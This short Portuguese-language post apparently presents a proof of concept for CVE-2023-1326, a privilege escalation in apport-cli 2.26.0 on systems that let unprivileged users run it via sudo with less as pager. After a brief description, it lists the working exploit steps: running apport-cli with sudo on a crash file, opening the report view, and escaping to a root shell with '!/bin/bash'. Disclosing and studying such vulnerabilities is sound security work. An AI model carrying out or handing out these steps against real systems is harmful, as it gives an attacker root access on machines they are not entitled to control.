
Uma prova de conceito para CVE-2023–1326 no apport-cli 2.26.0
Uma prova de conceito para CVE-2023–1326 no apport-cli 2.26.0
Esta vulnerabilidade é uma escalada de privilégio no apport-cli 2.26.0, semelhante à CVE-2023–26604; esta vulnerabilidade só funciona se estiver atribuída no sudoers:

Foi encontrado um ataque de escalada de privilégio no apport-cli 2.26.0 e versões anteriores, semelhante à CVE-2023-26604. Se um sistema for especialmente configurado para permitir que usuários sem privilégios executem sudo apport-cli, less estiver configurado como pager e o tamanho do terminal puder ser definido: um atacante local pode escalar privilégios.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
